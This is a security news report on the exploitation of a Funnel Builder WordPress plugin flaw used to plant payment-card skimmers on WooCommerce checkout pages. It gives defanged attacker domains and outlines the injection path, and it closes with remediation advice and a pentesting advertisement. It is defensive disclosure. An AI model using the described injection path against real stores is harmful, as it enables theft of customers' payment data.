Security researchers have uncovered active exploitation of a critical vulnerability affecting the **Funnel Builder** plugin for WordPress. This flaw allows unauthenticated attackers to inject malicious JavaScript snippets into **WooCommerce** checkout pages, potentially compromising sensitive customer data. ### Vulnerability Details The vulnerability, which currently lacks an official **CVE** identifier, impacts all versions of the plugin prior to 3.15.0.3. **Funnel Builder**, developed by **FunnelKit**, is a popular plugin used to customize checkout pages with features like one-click upsells and landing pages, aiming to optimize conversion rates. The plugin is active on over 40,000 websites, according to WordPress.org statistics. ### Attack Vector **Sansec** discovered the malicious activity, noting that the injected payload (analytics-reports[.]com/wss/jquery-lib.js) is disguised as a fake **Google Tag Manager**/ **Google Analytics** script. This script establishes a WebSocket connection to an external location (wss://protect-wss[.]com/ws). Attackers exploit the vulnerability by modifying the plugin’s global settings through an unprotected, publicly exposed checkout endpoint. This allows them to inject arbitrary JavaScript code into the plugin’s “External Scripts” setting, leading to the execution of malicious code on every checkout page. ### Data Theft According to **Sansec**, the attacker-controlled server delivers a customized payment card skimmer designed to steal: * Credit card numbers * CVVs * Billing addresses * Other customer information Stolen payment card details can be used for fraudulent online purchases or sold on dark web carding markets. ### Remediation **FunnelKit** addressed the vulnerability in version 3.15.0.3 of **Funnel Builder**, released recently. A security advisory from the vendor confirms the malicious activity, stating that they "identified an issue that allowed bad actors to inject scripts." Website owners and administrators are strongly advised to prioritize updating to the latest version of the plugin through the WordPress dashboard. Additionally, it is crucial to review `Settings > Checkout > External Scripts` for any suspicious or rogue scripts that may have been added by attackers.  ## [The Validation Gap: Automated Pentesting Answers One Question. You Need Six.](https://hubs.li/Q048zztN0) Automated pentesting tools deliver real value, but they were built to answer one question: can an attacker move through the network? They were not built to test whether your controls block threats, your detection rules fire, or your cloud configs hold. This guide covers the 6 surfaces you actually need to validate. [Download Now](https://hubs.li/Q048zztN0)